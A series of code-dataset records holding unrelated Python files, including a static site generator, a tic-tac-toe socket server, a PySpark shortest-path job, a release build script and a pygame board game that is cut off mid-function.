main()\n\n","sub_path":"nibble_aes/gen_gen_pairs.py","file_name":"gen_gen_pairs.py","file_ext":"py","file_size_in_byte":7045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"163423710","text":"import json\nimport os\nimport markdown\n\nfrom jinja2 import Environment\nfrom jinja2 import FileSystemLoader\nfrom os.path import join\nfrom os.path import normpath\n\n\ndef ensure_folder_exists(path):\n if not os.path.exists(path):\n os.mkdir(path)\n\n\ndef get_articles_config_json(filepath):\n if not os.path.exists(filepath):\n return None\n with open(filepath, 'r', encoding=\"UTF-8\") as file_handler:\n return json.load(file_handler)\n\n\ndef get_site_templates():\n templates_folder = \"templates\"\n index_page_template_name = \"index_page_template.html\"\n article_page_template_name = \"article_page_template.html\"\n 
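# NOTE: with autoescape=True, Jinja2 escapes every template variable by\n    # default; pre-rendered HTML such as the markdown output must be marked\n    # safe in the templates (e.g. via the |safe filter) to render as markup.\n    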
environment = Environment(loader=FileSystemLoader(templates_folder), autoescape=True)\n    index_page_template = environment.get_template(index_page_template_name)\n    article_page_template = environment.get_template(article_page_template_name)\n    return index_page_template, article_page_template\n\n\ndef save_rendered_html(html_output_filepath, html):\n    with open(html_output_filepath, \"w\", encoding=\"utf8\") as file_handler:\n        file_handler.write(html)\n\n\ndef form_path_to_html_file(markdown_path):\n    articles_folder = \"articles/\"\n    return normpath(join(articles_folder, markdown_path.replace('.md', '.html')))\n\n\ndef create_index_page_from_html_template(index_page_template, config):\n    rendered_index_page_filepath = \"site/index.html\"\n    index_page_template.globals['form_article_path'] = form_path_to_html_file\n    rendered_index_page = index_page_template.render(config)\n    save_rendered_html(rendered_index_page_filepath, rendered_index_page)\n\n\ndef get_article_markdown(filepath):\n    if not os.path.exists(filepath):\n        return None\n    with open(filepath, 'r', encoding=\"UTF-8\") as file_handler:\n        return file_handler.read()\n\n\ndef render_article_markdown_to_html_template(template, article_markdown, article_info):\n    link_to_index_page = \"../../index.html\"\n    article_info_data = article_info\n    article_html = markdown.markdown(article_markdown, extensions=['codehilite', 'fenced_code'])\n    article_info_data.update({'html': article_html, 'link': link_to_index_page})\n    return template.render(article_info_data)\n\n\ndef create_articles_from_html_template(article_page_template, config):\n    articles_info_from_config = config[\"articles\"]\n    markdown_articles_folder = \"./articles/\"\n    html_articles_folder = \"./site/articles/\"\n    ensure_folder_exists(html_articles_folder)\n    for article_info in articles_info_from_config:\n        article_source = article_info[\"source\"]\n        # replace the full '.md' suffix so names containing 'md' are not mangled\n        article_source_html = article_source.replace(\".md\", \".html\")\n        html_output_filepath = normpath(join(html_articles_folder, article_source_html))\n        article_topic_folder = os.path.split(html_output_filepath)[0]\n        ensure_folder_exists(article_topic_folder)\n        article_markdown_filepath = normpath(join(markdown_articles_folder, article_source))\n        article_markdown = get_article_markdown(article_markdown_filepath)\n        article_html = render_article_markdown_to_html_template(article_page_template,\n                                                                article_markdown, article_info)\n        save_rendered_html(html_output_filepath, article_html)\n\n\nif __name__ == \"__main__\":\n    site_folder = \"site\"\n    ensure_folder_exists(site_folder)\n    articles_config_json_filepath = \"config.json\"\n    config = get_articles_config_json(articles_config_json_filepath)\n    index_page_template, article_page_template = get_site_templates()\n    create_index_page_from_html_template(index_page_template, config)\n    create_articles_from_html_template(article_page_template, config)\n    print(\"Site was successfully generated in \\\"{}\\\" folder.\".format(site_folder))\n","sub_path":"site_generator.py","file_name":"site_generator.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"495205243","text":"#!/usr/bin/env python\r\ntry:\r\n    from setuptools import setup\r\n    from setuptools import Extension\r\nexcept ImportError:\r\n    from distutils.core import setup\r\n    from distutils.extension import Extension\r\n\r\n\r\ncmdclass = {}\r\next_modules = []\r\n\r\ntry:\r\n    from Cython.Distutils import build_ext\r\n    ext_modules += [\r\n        
Extension(\"abce.trade\", [\"abce/trade.pyx\"]),\r\n Extension(\"abce.multicurrencytrade\", [\"abce/multicurrencytrade.pyx\"]),\r\n Extension(\"abce.online_variance\", [\"abce/online_variance.pyx\"]),\r\n ]\r\n cmdclass.update({'build_ext': build_ext})\r\nexcept ImportError:\r\n ext_modules += [\r\n Extension(\"abce.trade\", [\"abce/trade.c\"]),\r\n Extension(\"abce.multicurrencytrade\", [\"abce/multicurrencytrade.c\"]),\r\n Extension(\"abce.online_variance\", [\"abce/online_variance.c\"]),\r\n ]\r\n\r\n\r\nsetup(name='abce',\r\n version='0.6.0a0',\r\n author='Davoud Taghawi-Nejad',\r\n author_email='Davoud@Taghawi-Nejad.de',\r\n description='Agent-Based Complete Economy modelling platform',\r\n url='https://github.com/DavoudTaghawiNejad/abce.git',\r\n package_dir={'abce': 'abce'},\r\n packages=['abce'],\r\n long_description=open('README.rst').read(),\r\n install_requires=['numpy >= 1.10.2p',\r\n 'pandas >= 0.17.1',\r\n 'networkx >= 1.9.1',\r\n 'flask >= 0.10.1',\r\n 'bokeh < 0.12.0',\r\n 'future'],\r\n include_package_data=True,\r\n ext_modules=ext_modules,\r\n use_2to3=True,\r\n cmdclass=cmdclass)\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"184207284","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# __author__ = \"Q1mi\"\n# Email: master@liwenzhou.com\n\n\"\"\"\nPython Web编程实战(小绿书)里面学到的知识点\n\"\"\"\n\n\n# 1.使用next获取循环中符合条件的值\na1 = -1\nfor i in range(1, 10):\n if not i % 4:\n a1 = i\n break\nprint(a1)\n\na2 = next((i for i in range(1, 10) if not i % 4), -1)\nprint(a2)\n\n# 2.执行调用直到某种情况结束\n\"\"\"\nblocks = []\nwhile True:\n block = f.read(32)\n if block == \"\":\n break\n blocks.append(block)\n\n\"\"\"\n\n\n\"\"\"\nfrom functools import partial\nblocks = []\nfor block in iter(partial(f.read, 32), \"\"):\n blocks.append(block)\n\"\"\"\n\n\n","sub_path":"next_partial.py","file_name":"next_partial.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"411256685","text":"#!/usr/bin/python3\n#\n# Wesleyan University\n# COMP 332, Spring 2018\n# Homework 2: Distributed tic-tac-toe game\n# Nikhil Ghosh\n\nimport binascii\nimport random\nimport socket\nimport sys\nimport threading\n\nfrom tictactoe import *\n\nclass Server():\n \"\"\"\n Server for TicTacToe game\n \"\"\"\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.backlog = 1\n self.start()\n\n def conn_send(self, conn, string):\n bin_data = string.encode('utf-8')\n conn.sendall(bin_data)\n\n # for reading client move\n def conn_read(self, conn):\n bin_data = ''\n while True:\n bin_data += conn.recv(1024).decode('utf-8')\n try:\n bin_data.index(' end')\n break\n except ValueError:\n pass\n bin_data = bin_data.split(' ')\n u_row, u_col = int(bin_data[0]), int(bin_data[1])\n return u_row, u_col\n\n\n def start(self):\n # Init server socket to listen for connections\n try:\n server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_sock.bind((self.host, self.port))\n server_sock.listen(self.backlog)\n except OSError as e:\n print (\"Unable to open server socket: \", e)\n if server_sock:\n server_sock.close()\n sys.exit(1)\n # Wait for client connection\n while True:\n client_conn, client_addr = server_sock.accept()\n print ('Client with address has connected', client_addr)\n thread = threading.Thread(target = self.play, args = (client_conn, 
client_addr))\n thread.start()\n\n\n def play(self, conn, addr):\n # Fill out this function\n print('Play game here')\n # Create board on server end\n board_size_init = conn.recv(1024)\n board_size_temp = board_size_init.decode('utf-8')\n board_size = int(board_size_temp.split(' ')[0])\n t = TicTacToe(board_size)\n t.display(\"\")\n\n # gameplay\n print(\"Play game\")\n while not t.check_done():\n # Receive client move\n u_row, u_col = self.conn_read(conn)\n # display client move on server board\n t.move(u_row, u_col, \"X\")\n # Display user (client) move\n t.display(\"User Move\")\n # Check state\n if t.check_done(): break\n # create server move\n s_row, s_col = t.server_choose()\n # implement server move on server board\n t.move(s_row, s_col, \"O\")\n # Display server move on server board\n t.display(\"Server move\")\n # send server move to client, add flag\n self.conn_send(conn, str(s_row) + \" \" + str(s_col) + \" end\")\n # Check state\n if t.check_done(): break\n\n\ndef main():\n server_host = 'localhost'\n server_port = 50008\n\n if len(sys.argv) > 1:\n server_host = sys.argv[1]\n server_port = int(sys.argv[2])\n\n # Create ttt server object\n s = Server(server_host, server_port)\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n print(\"Shutting down...\")\n except Exception:\n print(\"Other exception...\")\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"85308741","text":"from pyspark import SparkConf, SparkContext\nimport sys, os\nassert sys.version_info >= (3, 5)\nsc = SparkContext(conf=SparkConf().setAppName('shortest path'))\nassert sc.version >= '2.3'\n\ndef main(inputs, output, start, end):\n path = os.path.join(inputs, 'links-simple-sorted.txt')\n fields = sc.textFile(path).map(getEdges).cache()\n \n paths = sc.parallelize([(start, (None, 0))])\n for i in range(6):\n current = paths.filter(lambda x: x[1][1] == i)\n newPaths = fields.join(current).flatMap(getPaths)\n paths = paths.union(newPaths).reduceByKey(min).cache()\n\n if paths.lookup(end):\n break\n \n finalPath = [end]\n source = paths.lookup(end)[0][0]\n while source is not None:\n finalPath.insert(0, source)\n source = paths.lookup(source)[0][0]\n\n finalPath = sc.parallelize(finalPath, 1)\n finalPath.saveAsTextFile(output + '/path')\n\ndef getPaths(node):\n neighbours = node[1][0]\n distance = node[1][1][1]\n\n for neighbour in neighbours:\n yield (neighbour, (node[0], distance + 1))\n\ndef getEdges(node):\n fields = node.split()\n key = fields[0][:-1]\n\n nodes = []\n for i in range(1, len(fields)):\n nodes.append(fields[i])\n\n return (key, nodes)\n\nif __name__ == '__main__':\n inputs = sys.argv[1]\n output = sys.argv[2]\n start = sys.argv[3]\n end = sys.argv[4]\n main(inputs, output, start, end)","sub_path":"a6/p2/shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"17510725","text":"import cv2\nimport requests\nimport json\nimport argparse\n\napi_url_base = 'http://127.0.0.1:5000/api'\n\n\nimg_path = './images/testing-images/pepsi+products000029.jpg'\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", default=img_path, help=\"Path to the image\")\nap.add_argument(\"-s\", \"--scale\", type=float, default=1.5, help=\"scale factor size\")\nargs = vars(ap.parse_args())\n\nimg_path = 
args['image']\n\nimg = cv2.imread(img_path)\nif img is None:\n    exit('Image path is not valid. Please check!')\n\ndef detect_logo(files):\n    api_url = '{0}/detect_logo'.format(api_url_base)\n\n    response = requests.post(api_url, data=files)\n\n    return response\n\n\ndef main():\n    print('Requesting server...')\n    img_parsed = cv2.imencode(img_path[-4:], img)[1].tobytes()  # tostring() is a deprecated alias of tobytes()\n    # img_encoded = base64.b64encode(img_parsed)\n\n    # files = {'image': img_encoded}\n    query_response = detect_logo(img_parsed)\n    res = json.loads(query_response.content.decode('utf-8'))\n\n    with open('detectedBoxesAPI.csv', 'a') as f:\n        print('\\nDetected Boxes Coordinates: ')\n        num_boxes = 0\n        f.write(\"\\nFor image at: {0}\\n\".format(img_path))\n        for entry in res['detectedBoxes']:\n            num_boxes += 1\n            # Write on file\n            for i in entry:\n                f.write(str(i)); f.write(\" \")\n            f.write('\\n')\n            print(entry)\n        f.write(\"Number of Boxes: {0:d}\\n\".format(num_boxes))\n        print('\\nNumber of Boxes detected: {0}\\n'.format(num_boxes))\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"apiExample.py","file_name":"apiExample.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"460556840","text":"# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/topics/items.html\n\nfrom scrapy.item import Item, Field\n\nclass App(Item):\n\tname = Field()\n\tcategory = Field()\n\tdescription = Field()\n\tprice = Field()\n\tseller = Field()\n\tsellerWebSites = Field()\n\tcurVersion = Field()\n\tcurRating = Field()\n\tcurVersionRatingCount = Field()\n\tallVersionRatingCount = Field()\n\tappStoreLink = Field()\t#full url to app store entry\n","sub_path":"appscrape/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"538232038","text":"#! 
python3\n\nimport os, os.path as path, re, sys\n\n# Make it always run in root\nos.chdir(path.abspath(path.dirname(__file__)))\n\ndef read(file):\n\twith open(file, \"r\", encoding='utf-8') as f:\n\t\tcontent = f.read()\n\treturn content\n\ndef write(file, content):\n\twith open(file, \"w\", encoding=\"utf-8\") as f:\n\t\tf.write(content)\n\nclass Tasker:\n\tdef __init__(self, task_cls):\n\t\ttasks = task_cls()\n\t\targv = sys.argv[1:]\n\n\t\tif not argv:\n\t\t\targv = [\"default\"]\n\n\t\tfor command in argv:\n\t\t\tcommand, sep, param = command.partition(\":\")\n\n\t\t\tif sep:\n\t\t\t\tgetattr(tasks, command)(param)\n\t\t\telse:\n\t\t\t\tgetattr(tasks, command)()\n\nclass Tasks:\n\tdef default(self):\n\t\tself.build()\n\t\tself.dist()\n\t\tself.upload()\n\t\tself.git()\n\t\tself.install()\n\n\tdef dist(self):\n\t\timport subprocess, sys\n\t\tsubprocess.call([sys.executable, \"setup.py\", \"sdist\", \"bdist_wheel\"])\n\n\tdef upload(self):\n\t\timport subprocess, comiccrawler\n\t\tsubprocess.call([\"twine\", \"upload\", \"dist/*\" + comiccrawler.__version__ + \"*\"])\n\n\tdef git(self):\n\t\timport subprocess, comiccrawler\n\n\t\tversion = comiccrawler.__version__\n\n\t\tsubprocess.call([\"git\", \"add\", \"-A\", \".\"])\n\t\tsubprocess.call([\"git\", \"commit\", \"-m\", \"Release v\" + version])\n\t\tsubprocess.call([\"git\", \"tag\", \"-a\", \"v\" + version, \"-m\", \"Release v\" + version])\n\t\tsubprocess.call([\"git\", \"push\", \"--follow-tags\"])\n\n\tdef build(self):\n\t\timport re, comiccrawler, comiccrawler.mods\n\n\t\t# Build readme\n\t\treadme = read(\"README-src.rst\")\n\n\t\tversion = comiccrawler.__version__\n\t\tdomains = \" \".join(comiccrawler.mods.list_domain())\n\n\t\treadme = readme.replace(\"@@VERSION\", version)\n\t\treadme = readme.replace(\"@@DOMAINS\", domains)\n\n\t\twrite(\"README.rst\", readme)\n\n\t\t# Build setup.py\n\t\tsetup = read(\"setup-src.py\")\n\n\t\tsetup = setup.replace(\"@@VERSION\", repr(version))\n\n\t\twrite(\"setup.py\", setup)\n\n\tdef install(self):\n\t\timport subprocess\n\t\tsubprocess.call([\"pip\", \"install\", \"-e\", \".\"])\n\nif __name__ == \"__main__\":\n\tTasker(Tasks)\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"571588297","text":"# Sklenda\r\n# Originally by Petr Janik\r\n# Idea by Zdenek Sklenar\r\n\r\nimport pygame\r\nimport sys\r\nfrom pygame.locals import *\r\n\r\nBOARD_WIDTH = 4 \r\nBOARD_HEIGHT = 4 \r\nTILE_SIZE = 80\r\nWINDOW_WIDTH = 800\r\nWINDOW_HEIGHT = 500\r\nFPS = 30\r\nBLANK = None\r\n\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nYELLOW = (252, 201, 106)\r\nBROWN = (96, 46, 8)\r\nRED = (255, 0, 0)\r\n\r\nBG_COLOR = BLACK\r\nTILE_COLOR = WHITE\r\nTEXT_COLOR = WHITE\r\nBORDER_COLOR = BLACK\r\nPOINT_COLOR = RED\r\nBASIC_FONT_SIZE = 20\r\n\r\nCIRCLE = 'circle'\r\nSQUARE = 'square'\r\nSMALL = 'small'\r\nBIG = 'big'\r\nFALSE= False\r\nTRUE = True\r\n\r\nFPS_CLOCK = None\r\nDISPLAY_SURFACE = None\r\nBASIC_FONT = None\r\nBUTTONS = None\r\n\r\n\r\n\r\ndef main():\r\n global FPS_CLOCK, DISPLAY_SURFACE, BASIC_FONT, BUTTONS\r\n\r\n pygame.init()\r\n FPS_CLOCK = pygame.time.Clock()\r\n DISPLAY_SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\r\n pygame.display.set_caption('Sklenda')\r\n BASIC_FONT = pygame.font.Font('freesansbold.ttf', BASIC_FONT_SIZE)\r\n\r\n while True:\r\n run_game()\r\n\r\ndef terminate():\r\n pygame.quit()\r\n sys.exit()\r\n \r\ndef 
run_game():\r\n icons = [\r\n [\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n ],\r\n [\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n ],\r\n [\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n ],\r\n [\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n [None, None, None, None],\r\n ]\r\n ]\r\n icons2 = [\r\n [\r\n [CIRCLE, YELLOW, FALSE, SMALL],\r\n [CIRCLE, YELLOW, FALSE, BIG],\r\n [CIRCLE, YELLOW, TRUE, SMALL],\r\n [CIRCLE, YELLOW, TRUE, BIG],\r\n ],\r\n [\r\n [CIRCLE, BROWN, FALSE, SMALL],\r\n [CIRCLE, BROWN, FALSE, BIG],\r\n [CIRCLE, BROWN, TRUE, SMALL],\r\n [CIRCLE, BROWN, TRUE, BIG],\r\n ],\r\n [\r\n [SQUARE, YELLOW, FALSE, SMALL],\r\n [SQUARE, YELLOW, FALSE, BIG],\r\n [SQUARE, YELLOW, TRUE, SMALL],\r\n [SQUARE, YELLOW, TRUE, BIG],\r\n ],\r\n [\r\n [SQUARE, BROWN, FALSE, SMALL],\r\n [SQUARE, BROWN, FALSE, BIG],\r\n [SQUARE, BROWN, TRUE, SMALL],\r\n [SQUARE, BROWN, TRUE, BIG],\r\n ]\r\n ] \r\n WIN = False\r\n choosed = False\r\n placed = 0\r\n shape, color, point, size = None, None, None, None\r\n game_state = 1\r\n new_surf, new_rect = make_text('New Game', BLACK, TILE_COLOR, WINDOW_WIDTH - 145, WINDOW_HEIGHT - 50)\r\n while True: \r\n if game_state == 1:\r\n message = \"Player 1 chooses block.\"\r\n elif game_state == 2:\r\n message = \"Player 2 places block.\"\r\n player = \"2\"\r\n elif game_state == 3:\r\n message = \"Player 2 chooses block.\"\r\n elif game_state == 4:\r\n message = \"Player 1 places block.\"\r\n player = \"1\"\r\n\r\n if placed == 16:\r\n message = \"It is a tie! 
Press New Game to play again.\"\r\n \r\n if WIN:\r\n message = \"Player \" + player + \" wins!\"\r\n for event in pygame.event.get():\r\n if event.type == QUIT or (event.type == KEYUP and event.key == K_ESCAPE):\r\n terminate()\r\n elif event.type == pygame.MOUSEBUTTONUP:\r\n if new_rect.collidepoint(event.pos):\r\n return\r\n \r\n for event in pygame.event.get():\r\n if event.type == QUIT or (event.type == KEYUP and event.key == K_ESCAPE):\r\n terminate()\r\n elif event.type == pygame.MOUSEBUTTONUP:\r\n \r\n if game_state == 1 or game_state == 3:\r\n if get_tile_clicked2(event.pos[0], event.pos[1]) != (None, None):\r\n tile_x, tile_y = get_tile_clicked2(event.pos[0], event.pos[1])\r\n if icons2[tile_x][tile_y][0] != None:\r\n shape, color, point, size = icons2[tile_x][tile_y][0], icons2[tile_x][tile_y][1], icons2[tile_x][tile_y][2], icons2[tile_x][tile_y][3]\r\n icons2[tile_x][tile_y] = [None, None, None, None]\r\n choosed = True\r\n if game_state == 1:\r\n game_state = 2\r\n elif game_state == 3:\r\n game_state = 4\r\n \r\n elif game_state == 2 or game_state == 4:\r\n if get_tile_clicked(event.pos[0], event.pos[1]) != (None, None):\r\n tile_x, tile_y = get_tile_clicked(event.pos[0], event.pos[1])\r\n if icons[tile_x][tile_y][0] == None:\r\n choosed = False\r\n icons[tile_x][tile_y] = [shape, color, point, size]\r\n placed += 1\r\n WIN = check_for_quit(icons, tile_x, tile_y)\r\n if game_state == 2:\r\n game_state = 3\r\n elif game_state == 4:\r\n game_state = 1\r\n \r\n if new_rect.collidepoint(event.pos):\r\n return\r\n \r\n draw_board(icons, icons2, shape, color, point, size, choosed, new_surf, new_rect, message)\r\n\r\n pygame.display.update()\r\n FPS_CLOCK.tick(FPS)\r\n\r\ndef get_left_top_of_tile(tile_x, tile_y):\r\n left = (tile_x * TILE_SIZE) + 40\r\n top = (tile_y * TILE_SIZE) + 110\r\n return (left, top)\r\n\r\ndef get_left_top_of_tile2(tile_x, tile_y):\r\n left = (tile_x * TILE_SIZE) + 440\r\n top = (tile_y * TILE_SIZE) + 110\r\n return (left, top)\r\n\r\ndef draw_tile(tile_x, tile_y):\r\n left, top = get_left_top_of_tile(tile_x, tile_y)\r\n pygame.draw.rect(DISPLAY_SURFACE, TILE_COLOR, (left, top, TILE_SIZE, TILE_SIZE))\r\n pygame.draw.rect(DISPLAY_SURFACE, BORDER_COLOR, (left-1, top-1, TILE_SIZE+2, TILE_SIZE+2), 1)\r\n\r\ndef draw_tile2(tile_x, tile_y):\r\n left, top = get_left_top_of_tile2(tile_x, tile_y)\r\n pygame.draw.rect(DISPLAY_SURFACE, TILE_COLOR, (left, top, TILE_SIZE, TILE_SIZE))\r\n pygame.draw.rect(DISPLAY_SURFACE, BORDER_COLOR, (left-1, top-1, TILE_SIZE+2, TILE_SIZE+2), 1)\r\n\r\ndef make_text(text, color, bg_color, top, left):\r\n text_surf = BASIC_FONT.render(text, True, color, bg_color)\r\n text_rect = text_surf.get_rect()\r\n text_rect.topleft = (top, left)\r\n return (text_surf, text_rect)\r\n\r\ndef draw_board(icons, icons2, shape, color, point, size, choosed, new_surf, new_rect, message=\"\"):\r\n DISPLAY_SURFACE.fill(BG_COLOR)\r\n text_surf, text_rect = make_text(message, TEXT_COLOR, BG_COLOR, 40, 40)\r\n DISPLAY_SURFACE.blit(text_surf, text_rect)\r\n\r\n if choosed: \r\n display_choosed(icons2, shape, color, point, size)\r\n \r\n for tile_x in range(BOARD_WIDTH):\r\n for tile_y in range(BOARD_WIDTH):\r\n draw_tile(tile_x, tile_y)\r\n \r\n for tile_x in range(BOARD_WIDTH):\r\n for tile_y in range(BOARD_WIDTH):\r\n draw_tile2(tile_x, tile_y)\r\n\r\n for tile_x in range(BOARD_WIDTH):\r\n for tile_y in range(BOARD_WIDTH):\r\n draw_icon(icons, tile_x, tile_y)\r\n\r\n for tile_x in range(BOARD_WIDTH):\r\n for tile_y in range(BOARD_WIDTH):\r\n draw_icon2(icons2, 
tile_x, tile_y)\r\n\r\n DISPLAY_SURFACE.blit(new_surf, new_rect)\r\n\r\ndef display_choosed(list, shape, color, point, size):\r\n left, top = 280, 20\r\n if shape == CIRCLE:\r\n center_point = (left + 40, top + 40)\r\n if size == SMALL:\r\n pygame.draw.circle(DISPLAY_SURFACE, color, center_point, 20)\r\n elif size == BIG:\r\n pygame.draw.circle(DISPLAY_SURFACE, color, center_point, 30)\r\n if point:\r\n pygame.draw.circle(DISPLAY_SURFACE, POINT_COLOR, center_point, 10)\r\n elif shape == SQUARE:\r\n center_point = (left + 40, top + 40)\r\n if size == SMALL:\r\n rect = (left + 20, top + 20, 40, 40)\r\n elif size == BIG:\r\n rect = (left + 10, top + 10, 60, 60)\r\n pygame.draw.rect(DISPLAY_SURFACE, color, rect)\r\n if point:\r\n pygame.draw.circle(DISPLAY_SURFACE, POINT_COLOR, center_point, 10)\r\n\r\ndef draw_icon(list, tile_x, tile_y):\r\n shape, color, point, size = list[tile_x][tile_y][0], list[tile_x][tile_y][1], list[tile_x][tile_y][2], list[tile_x][tile_y][3]\r\n left, top = get_left_top_of_tile(tile_x, tile_y)\r\n if shape == CIRCLE:\r\n center_point = (left + 40, top + 40)\r\n if size == SMALL:\r\n pygame.draw.circle(DISPLAY_SURFACE, color, center_point, 20)\r\n elif size == BIG:\r\n pygame.draw.circle(DISPLAY_SURFACE, color, center_point, 30)\r\n if point:\r\n pygame.draw.circle(DISPLAY_SURFACE, POINT_COLOR, center_point, 10)\r\n elif shape == SQUARE:\r\n center_point = (left + 40, top + 40)\r\n if size == SMALL:\r\n rect = (left + 20, top + 20, 40, 40)\r\n elif size == BIG:\r\n rect = (left + 10, top + 10, 60, 60)\r\n pygame.draw.rect(DISPLAY_SURFACE, color, rect)\r\n if point:\r\n pygame.draw.circle(DISPLAY_SURFACE, POINT_COLOR, center_point, 10)\r\n \r\ndef draw_icon2(list, tile_x, tile_y):\r\n shape, color, point, size = list[tile_x][tile_y][0], list[tile_x][tile_y][1], list[tile_x][tile_y][2], list[tile_x][tile_y][3]\r\n left, top = get_left_top_of_tile2(tile_x, tile_y)\r\n if shape == CIRCLE:\r\n center_point = (left + 40, top + 40)\r\n if size == SMALL:\r\n pygame.draw.circle(DISPLAY_SURFACE, color, center_point, 20)\r\n elif size == BIG:\r\n pygame.draw.circle(DISPLAY_SURFACE, color, center_point, 30)\r\n if point:\r\n pygame.draw.circle(DISPLAY_SURFACE, POINT_COLOR, center_point, 10)\r\n elif shape == SQUARE:\r\n center_point = (left + 40, top + 40)\r\n if size == SMALL:\r\n rect = (left + 20, top + 20, 40, 40)\r\n elif size == BIG:\r\n rect = (left + 10, top + 10, 60, 60)\r\n pygame.draw.rect(DISPLAY_SURFACE, color, rect)\r\n if point:\r\n pygame.draw.circle(DISPLAY_SURFACE, POINT_COLOR, center_point, 10)\r\n\r\ndef get_tile_clicked(x, y):\r\n for tile_x in range(BOARD_WIDTH):\r\n for tile_y in range(BOARD_HEIGHT):\r\n left, top = get_left_top_of_tile(tile_x, tile_y)\r\n tile_rect = pygame.Rect(left, top, TILE_SIZE, TILE_SIZE)\r\n if tile_rect.collidepoint(x, y):\r\n return (tile_x, tile_y)\r\n return (None, None)\r\n\r\ndef get_tile_clicked2(x, y):\r\n for tile_x in range(BOARD_WIDTH):\r\n for tile_y in range(BOARD_HEIGHT):\r\n left, top = get_left_top_of_tile2(tile_x, tile_y)\r\n tile_rect = pygame.Rect(left, top, TILE_SIZE, TILE_SIZE)\r\n if tile_rect.collidepoint(x, y):\r\n return (tile_x, tile_y)\r\n return (None, None)\r\n\r\ndef check_for_quit(icons, tile_x, tile_y):\r\n list = [None, None, None, None]\r\n lp_icon = icons[tile_x][tile_y]\r\n top_left = True\r\n top_right = True\r\n bottom_left = True\r\n bottom_right = True\r\n for i in range(4): #checks horizontal line\r\n icon = icons[i][tile_y]\r\n list[i] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n 
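# compare() reports a win: all four gathered tiles match the newly placed\r\n    # block on at least one shared attribute (shape, color, point or size).\r\n    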
if compare(list):\r\n return True\r\n for i in range(4): #checks vertical line\r\n icon = icons[tile_x][i]\r\n list[i] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n if compare(list):\r\n return True\r\n if tile_x == 0:\r\n top_left = False\r\n bottom_left = False\r\n if tile_x == 3:\r\n top_right = False\r\n bottom_right = False\r\n if tile_y == 0:\r\n top_left = False\r\n top_right = False\r\n if tile_y == 3:\r\n bottom_left = False\r\n bottom_right = False\r\n if top_left:\r\n icon = icons[tile_x][tile_y]\r\n list[0] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x][tile_y - 1]\r\n list[1] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x - 1][tile_y - 1]\r\n list[2] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x - 1][tile_y]\r\n list[3] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n if compare(list):\r\n return True\r\n if top_right:\r\n icon = icons[tile_x][tile_y]\r\n list[0] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x][tile_y - 1]\r\n list[1] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x + 1][tile_y - 1]\r\n list[2] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x + 1][tile_y]\r\n list[3] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n if compare(list):\r\n return True\r\n if bottom_left:\r\n icon = icons[tile_x][tile_y]\r\n list[0] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x][tile_y + 1]\r\n list[1] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x - 1][tile_y + 1]\r\n list[2] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x - 1][tile_y]\r\n list[3] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n if compare(list):\r\n return True\r\n if bottom_right:\r\n icon = icons[tile_x][tile_y]\r\n list[0] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x][tile_y + 1]\r\n list[1] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x + 1][tile_y + 1]\r\n list[2] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n icon = icons[tile_x + 1][tile_y]\r\n list[3] = check_if_same(icons, lp_icon, icon, tile_x, tile_y)\r\n if 